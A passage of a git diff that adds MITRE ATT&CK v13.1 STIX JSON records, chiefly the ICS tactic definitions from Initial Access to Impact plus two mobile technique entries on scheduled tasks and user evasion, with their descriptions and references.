"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046.json new file mode 100644 index 0000000000000000000000000000000000000000..fad6920df265caf8a8ecfab5b0790669ed21e63b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--66fa705a-be3f-4a82-a4c8-67ed73e9305d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-29T21:38:48.906Z", + "name": "Privilege Escalation", + "description": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "privilege-escalation", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046", + "created": "2021-04-10T17:32:33.899Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0111", + "external_id": "TA0111" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924.json new file mode 100644 index 0000000000000000000000000000000000000000..311a6f3c515e3a3ab28a2fd3410684e54cd0ed49 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--eec92533-5458-4714-ada6-c40f0fc7b459", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:09:46.867Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your ICS environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. These techniques abuse default credentials, known accounts, and vulnerable services, and may also leverage dual-homed devices and systems that reside on both the IT and OT networks. The adversary uses these techniques to pivot to their next point in the environment, positioning themselves to where they want to be or think they should be. Following through on their primary objective often requires [Discovery](https://attack.mitre.org/tactics/TA0102) of the network and [Collection](https://attack.mitre.org/tactics/TA0100) to develop awareness of unique ICS devices and processes, in order to find their target and subsequently gain access to it. Reaching this objective often involves pivoting through multiple systems, devices, and accounts. Adversaries may install their own remote tools to accomplish Lateral Movement or leverage default tools, programs, and manufacturer set or other legitimate credentials native to the network, which may be stealthier.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "lateral-movement", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0109", + "external_id": "TA0109" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453.json new file mode 100644 index 0000000000000000000000000000000000000000..972e96fa2512a7ababebda1a488e4642838c80eb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--dde05676-f9ba-452f-8bef-20b83bd49267", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Discovery", + "description": "The adversary is locating information to assess and identify their targets in your environment.\n\nDiscovery consists of techniques that adversaries use to survey your ICS environment and gain knowledge about the internal network, control system devices, and how their processes interact. These techniques help adversaries observe the environment and determine next steps for target selection and Lateral Movement. They also allow adversaries to explore what they can control and gain insight on interactions between various control system processes. Discovery techniques are often an act of progression into the environment which enable the adversary to orient themselves before deciding how to act. Adversaries may use Discovery techniques that result in Collection, to help determine how available resources benefit their current objective. A combination of native device communications and functions, and custom tools are often used toward this post-compromise information-gathering objective.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "discovery", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0102", + "external_id": "TA0102" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a.json new file mode 100644 index 0000000000000000000000000000000000000000..a24910c84f0e3fd4c40f66e8692718449f27f492 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1be20e95-6785-4829-a519-8883a923217e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your ICS environment.\n\nInitial Access consists of techniques that adversaries may use as entry vectors to gain an initial foothold within an ICS environment. These techniques include compromising operational technology assets, IT resources in the OT network, and external remote services and websites. They may also target third party entities and users with privileged access. In particular, these initial access footholds may include devices and communication mechanisms with access to and privileges in both the IT and OT environments. IT resources in the OT environment are also potentially vulnerable to the same attacks as enterprise IT systems. Trusted third parties of concern may include vendors, maintenance personnel, engineers, external integrators, and other outside entities involved in expected ICS operations. Vendor maintained assets may include physical devices, software, and operational equipment. Initial access techniques may also leverage outside devices, such as radios, controllers, or removable media, to remotely interfere with and possibly infect OT operations.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "initial-access", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0108", + "external_id": "TA0108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279.json new file mode 100644 index 0000000000000000000000000000000000000000..ca2acca15c026cbc6c392de0fa9e4bfc4cec632b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--b1549907-b685-4a04-9f14-cc7ddfcaf1bf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:22:09.571Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment.\n\nImpact consists of techniques that adversaries use to disrupt, compromise, destroy, and manipulate the integrity and availability of control system operations, processes, devices, and data. These techniques encompass the influence and effects resulting from adversarial efforts to attack the ICS environment or that tangentially impact it. Impact techniques can result in more instantaneous disruption to control processes and the operator, or may result in more long term damage or loss to the ICS environment and related operations. The adversary may leverage [Impair Process Control](https://attack.mitre.org/tactics/TA0106) techniques, which often manifest in more self-revealing impacts on operations, or [Impair Process Control](https://attack.mitre.org/tactics/TA0106) techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact. In some scenarios, control system processes can appear to function as expected, but may have been altered to benefit the adversary\u2019s goal over the course of a longer duration. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.\n\n[Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828), [Theft of Operational Information](https://attack.mitre.org/techniques/T0882), and [Damage to Property](https://attack.mitre.org/techniques/T0879) are meant to encompass some of the more granular goals of adversaries in targeted and untargeted attacks. These techniques in and of themselves are not necessarily detectable, but the associated adversary behavior can potentially be mitigated and/or detected.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "impact", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279", + "created": "2019-03-14T18:44:44.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0105", + "external_id": "TA0105" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac.json new file mode 100644 index 0000000000000000000000000000000000000000..2f95bd08c63ba84dab90466fae2c35c17701e4ee --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--263ad2ee-d011-486d-b84a-e02c2c6b8eb5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Persistence", + "description": "The adversary is trying to maintain their foothold in your ICS environment.\n\nPersistence consists of techniques that adversaries use to maintain access to ICS systems and devices across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that allow them to secure their ongoing activity and keep their foothold on systems. This may include replacing or hijacking legitimate code, firmware, and other project files, or adding startup code and downloading programs onto devices.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "persistence", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0110", + "external_id": "TA0110" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45.json new file mode 100644 index 0000000000000000000000000000000000000000..9f6c125393a81ad60c8d3284634d05106e3fec32 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--a24543db-962c-4997-be6a-6679c680b570", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:19:16.160Z", + "name": "Execution", + "description": "The adversary is trying to run code or manipulate system functions, parameters, and data in an unauthorized way.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system, device, or other asset. This execution may also rely on unknowing end users or the manipulation of device operating modes to run. Adversaries may infect remote targets with programmed executables or malicious project files that operate according to specified behavior and may alter expected device behavior in subtle ways. Commands for execution may also be issued from command-line interfaces, APIs, GUIs, or other available interfaces. Techniques that run malicious code may also be paired with techniques from other tactics, particularly to aid network [Discovery](https://attack.mitre.org/tactics/TA0102) and [Collection](https://attack.mitre.org/tactics/TA0100), impact operations, and inhibit response functions.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "execution", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0104", + "external_id": "TA0104" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f.json new file mode 100644 index 0000000000000000000000000000000000000000..5233138e03d7a3a4fe8e7855531896abe139a899 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7ed50e9f-c82a-483e-8ed8-8523e9972a03", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with and control compromised systems, controllers, and platforms with access to your ICS environment.\n\nCommand and Control consists of techniques that adversaries use to communicate with and send commands to compromised systems, devices, controllers, and platforms with specialized applications used in ICS environments. Examples of these specialized communication devices include human machine interfaces (HMIs), data historians, SCADA servers, and engineering workstations (EWS). Adversaries often seek to use commonly available resources and mimic expected network traffic to avoid detection and suspicion. For instance, commonly used ports and protocols in ICS environments, and even expected IT resources, depending on the target network. Command and Control may be established to varying degrees of stealth, often depending on the victim\u2019s network structure and defenses.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "command-and-control", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0101", + "external_id": "TA0101" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9.json new file mode 100644 index 0000000000000000000000000000000000000000..e0f2593ecda3abbefefb6570859efc33baabd394 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--a40eb987-7bd7-4e40-bcfa-ef30019cd120", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:18:50.880Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest and domain knowledge on your ICS environment to inform their goal.\n\nCollection consists of techniques adversaries use to gather domain knowledge and obtain contextual feedback in an ICS environment. This tactic is often performed as part of [Discovery](https://attack.mitre.org/tactics/TA0102), to compile data on control systems and targets of interest that may be used to follow through on the adversary\u2019s objective. Examples of these techniques include observing operation states, capturing screenshots, identifying unique device roles, and gathering system and diagram schematics. Collection of this data can play a key role in planning, executing, and even revising an ICS-targeted attack. Methods of collection depend on the categories of data being targeted, which can include protocol specific, device specific, and process specific configurations and functionality. Information collected may pertain to a combination of system, supervisory, device, and network related data, which conceptually fall under high, medium, and low levels of plan operations. For example, information repositories on plant data at a high level or device specific programs at a low level. Sensitive floor plans, vendor device manuals, and other references may also be at risk and exposed on the internet or otherwise publicly accessible.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "collection", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0100", + "external_id": "TA0100" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7.json new file mode 100644 index 0000000000000000000000000000000000000000..2fbafa3713dfc0959a54b5f7a3ddf7824cc60753 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--da5ec217-893f-4e0c-a8eb-8090c27c4ba1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Evasion", + "description": "The adversary is trying to avoid security defenses.\n\nEvasion consists of techniques that adversaries use to avoid technical defenses throughout their campaign. Techniques used for evasion include removal of indicators of compromise, spoofing communications, and exploiting software vulnerabilities. Adversaries may also leverage and abuse trusted devices and processes to hide their activity, possibly by masquerading as master devices or native software. Methods of defense evasion for this purpose are often more passive in nature.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "evasion", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0103", + "external_id": "TA0103" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024.json new file mode 100644 index 0000000000000000000000000000000000000000..73a720358a01b987b2ad15a67b2e45d95b475740 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--fbddcd5c-6d30-4496-b029-7ae4ca24783c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:15:17.020Z", + "name": "Impair Process Control", + "description": "The adversary is trying to manipulate, disable, or damage physical control processes.\n\nImpair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. Adversaries may follow up with or use [Inhibit Response Function](https://attack.mitre.org/tactics/TA0107) techniques in tandem, to assist with the successful abuse of control processes to result in [Impact](https://attack.mitre.org/tactics/TA0105).", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "impair-process-control", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0106", + "external_id": "TA0106" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d-checkpoint.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d-checkpoint.json new file mode 100644 index 0000000000000000000000000000000000000000..27446ba7701cb84826da182f9b57ee7d3185746a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d-checkpoint.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--fe970af0-3ca3-48ea-bade-be2e7d8567a6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.\n\nOn Android, the `WorkManager` API allows asynchronous tasks to be scheduled with the system. `WorkManager` was introduced to unify task scheduling on Android, using `JobScheduler`, `GcmNetworkManager`, and `AlarmManager` internally. `WorkManager` offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)\n\nOn iOS, the `NSBackgroundActivityScheduler` API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "created": "2020-11-04T16:43:31.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1603", + "external_id": "T1603" + }, + { + "source_name": "Android WorkManager", + "description": "Google. (n.d.). Schedule tasks with WorkManager. Retrieved November 4, 2020.", + "url": "https://developer.android.com/topic/libraries/architecture/workmanager" + }, + { + "source_name": "Apple NSBackgroundActivityScheduler", + "description": "Apple. (n.d.). NSBackgroundActivityScheduler. Retrieved November 4, 2020.", + "url": "https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08-checkpoint.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08-checkpoint.json new file mode 100644 index 0000000000000000000000000000000000000000..340e35ac733ac9d05ea651286965db1c44fabf06 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08-checkpoint.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--9b5ba1f9-1270-4ac9-8daa-1862b7d7053e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "created": "2022-04-11T20:05:56.069Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1628.002", + "url": "https://attack.mitre.org/techniques/T1628/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary\u2019s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device\u2019s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:05:56.069Z", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": 